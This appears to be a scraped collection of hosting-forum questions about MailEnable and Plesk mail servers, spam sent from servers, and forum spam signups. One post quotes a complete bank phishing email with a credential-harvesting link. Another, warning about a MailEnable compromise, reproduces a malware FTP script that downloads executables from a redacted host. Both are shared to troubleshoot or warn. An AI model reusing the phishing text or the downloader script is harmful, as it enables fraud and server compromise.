I added users directly to mailenable (using their migration utility to import from an old mail server which plesk does not support). The domains exist in plesk but not the individual email users/mailboxes.
Now I want to add those email users to plesk but it doesn't let (not surprisingly), when I try to add a user it returns an error: "Unable to update the mail account properties:mailmng failed: MEAOPO.Mailbox.AddMailbox failed"
My question is: How can I add the users that already exist in MailEnable to the plesk configuration? (i.e. ignore the error and add the user to the plesk database, or even better yet if plesk can read the configuration and add all users)
Tthe plesk kb articles suggest running mchk.exe but that is designed to take users from plesk and add them to mailenable, I need the reverse).
Is there a way to configure the mailing lists created with Plesk (using MailEnable 6.5) using Plesk or another web interface like it is possible with mailman under Linux?
It is not very convenient to be required to do such stuff via RDP (and so manual by me for every customer)...
I use Windows Plesk v 11.5.30 with Mailenable Standard Edition 7.0 version. In mailenable site i saw a new version of Mailenable standard version (7.5.1). URL...Can i download and update Mailenable version of my Windows PLesk? If i made this change and have problem can i do downgrande later?
Sometimes my clients install untrusted scripts to their account what causes spamming, because these scripts sending high number of spam emails. Is there an automatically way to disable php mail function, or disable the account temporary?
I have recently been receiving reports from AOL's feedback loop that my server is sending out spam. I have checked the whole server, but cannot find anything strange.
There are some strange things with these feedback reports. I'll post a few lines below (i crossed out my domain with xxx):
Quote:
Received: from andersenreesel by holderem.xxx.biz with local (Exim 4.23)
Received: (qmail 64859 invoked by uid 24901)
Received: from janislanhami by xxx.biz with local (Exim 4.26)
Received: from raphaelpinkertone by standei.xxx.biz with local (Exim 4.23)
Received: from imanoldelphine by dispatched.xxx.biz with local (Exim 4.23)
Received: from conrado by hostic.xxx.biz with local (Exim 4.23)
The first issue i have is with the subdomains, like "dispatched", "standei", "hostic", etc. These subdomains do not exist on my system. Also, my server does not run the exim MTA.
Another issue i have is the "invoked by uid" statements with uid's 147 and 24901. These UID's do not exist on my system. The passwd file uid's go to around 110.
Apart from these strange things, the IP that is listed in the upper part of the headers:
Quote:
Received: from xxx.biz (xxx.biz [85.xxx.xxx.xxx])
The domain and IP address is correct there, which should indicate that the spam was sent from my system. Or wasn't it?
I host a vBulletin forum on a US server. I've been getting a lot of signups from one particular spammer, wanting to post about gold harvesting for WoW. I've blocked his IP's, however he keeps using proxies.
He constantly signs up under the name "Array"... Is there a way I can block him for good? I can't moderate user sign-ups, as I'm mostly away from my computer and can't moderate them all the time.
when i click "Email Accounts" section in Helm see "Failed to get Email Accounts",also cant add any new Email Account, Helm Log:
Cannot create ActiveX component. at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName) at MailEnable.Administration.Mailbox.GetAutoResponderStatus() at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name) at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList() at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
None of domain in this email is hosted with us but there are thousand of emails day some body blast in our queue. We are failed to detect. We have enabled phpnobody spam logging but failed to get track of this user.
how to catch this spammer. There are no clues of to catch him.
[root@sm4 ~]# /root/qmHandle -m3261696
-------------- MESSAGE NUMBER 3261696 -------------- Received: (qmail 7056 invoked from network); 16 May 2007 05:34:18 -0500 Received: from axicom.net (HELO User) (67.112.176.250) by 14.32.5446.static.theplanet.com with SMTP; 16 May 2007 05:34:18 -0500 Reply-To: <notice@boamilitary.com> From: "Bank of America Military Bank"<notice@boamilitary.com> Subject: Notification from Bank of America Military Bank Date: Wed, 16 May 2007 04:44:51 -0700 MIME-Version: 1.0 Content-Type: text/html; charset="Windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
<title>Military Bank Online and Bill Payer Deactivation</title> <FONT face=Arial size=2> </FONT> <DIV> <p><font face="Arial" size="2" color="#FFFFFF"> ...<img border="0" src="http://power-web43.net/images/boa.bmp"></font></p> <p><font face="Arial" size="2"> Dear Member,</font></p> <DIV><font face="Arial" size="2"> This is your official notification from Bank of America Military Bank that the service(s) listed below<BR> will be deactivated and deleted if not renewed immediately. Previous notifications have<BR> been sent to the Billing Contact assigned to this account. As the Primary Contact, you<BR> must renew the service(s) listed below or it will be deactivated and deleted. <BR> <BR> <BR> <b> <a target="_blank" href="http://moremail.epicalliance.com/america.php"><FONT color=#003399>Renew Now</FONT></a> </b>your <b>Military Bank Online </b>and<b> Bill Payer </b> services.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> SERVICE: <b>Military Bank Online </b>and<b> Bill Payer</b>.<BR> EXPIRATION: <b>May, 18 2007</b></font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> Thank you for using Military Bank Online. <br> We appreciate your business and the opportunity to serve you.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> Bank of America Military Bank Member Service</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> *****************************************************************************<BR> IMPORTANT MEMBER SERVICE INFORMATION<BR> *****************************************************************************</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> Please do not reply to this message. For any inquiries, contact Member Service.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> <BR> Copyright � 2007 Bank of America Corporation. All rights reserved.</font></DIV> </DIV>
None of domain in this email is hosted with us but there are thousand of emails day some body blast in our queue. We are failed to detect. We have enabled phpnobody spam logging but failed to get track of this user.
how to catch this spammer. There are no clues of to catch him.
I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen couple of dozen boxes getting infected because they had a MailEnable Standard 1.95 for instance (or Professional 2.11), or anything else that's not up to date. Virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swapped by now. Biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95 where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed and 5 minutes after the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable MailEnable SMTP Relay Service. This is not a part of MailEnable and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory which does quite something to your server. Also check for following:
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse) user anonymous anonymous@on.the.net lcd c:windowssystem32 get explorer.exe get runservice_bis.dll get kill.exe get fport.exe get hyberport.exe get JASFV.INI bye
Nothing has been heard from SWsoft about this issue yet...
I have MailEnable free on a windows server with Plesk 8.1.
I need IMAP so I thought at hMail. The problem:
I need to copy all the mail content to hMail as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some vbs from PMM but that requires me to know all the accounts passwords and to do manually every backup/restore for all the e-mails.
Is there an other way to switch to hMail without loosing the mail content ? (IMAPCopy is not an option as it need IMAP and that is not present in MailEnable free, and also needs all all the passwords for all the accounts).
An other problem, I do not have an other windows server so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
Now first I will say I have NO idea how such spamming works, how a punk can get on my server and sent emails out.
I have had a team to look at it they also did something, but now it happens again for the 5th time, what can i do, are there any software or tools one can use like a antivirus to check the server and how can I avoid such sh..
I just found posts every a few days from an apparent spammer "sagepowder" in my forum (not so popular and has nothing to do with skiing). The subject is always "new here".
The content is "Any snowboarders or skiiers on this forum? I am planning a trip to BC on a snowboarding trip next week" or "I am new here, just saying hello".
I checked the apache log and it doesn't seem to be a robot script posting this. i.e. it browses to the index page, picked up my hidden field that blocks robots, post new topic, the go back to index page.
What surprised me is that when I google this guy, I got 108,000 results with the same content on tons of forums! All with total post number of 1 or 2 on each forum: [url]
I recently moved web services for one of my hosted domains (let's call it example.com) from one server (let's call it .org) to another server (let's call it .net) example.com has been on .org for about 5 years. .org handled all example.com web services, and all email. I recently updated example.com's DNS record to point www.example.com and example.com to the .net server. I didn't change the MX record or mail.example.com to point to .net. Mail continues to be delivered normally to example.com on the .org server.
Except now spammers are hitting the .net server, e.g.
Is it normal practice for spammers to send dictionary attack based spam to a domain's server that doesn't even handle email? All the spam coming is clearly just random email addresses not based on anything that exsists at the domain, and most of the addresses are so very random I can't imagine they exsist anywhere.
For about a month or so now I have a domain I host under serious attack from what I think are spammers. It's a wordpress site, and they are getting big numbers of POST requests to the WordPress comments file, e.g.
Code:
POST /wp-comments-post.php HTTP/1.1 It's a well distributed attack, and I'm doing well with some scripts I wrote to block the requests to the wp-comments-post.php file. The real comment file has long since been moved, so any POST to the file gets firewalled. It's several thousand IPs from all over the place.
I don't believe it's a malicious attempt to bring the site down, but I'm guessing it's a blog comment spammer that has something set wrong and he's pounding this site to death by accident. I could be wrong on that though.
we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.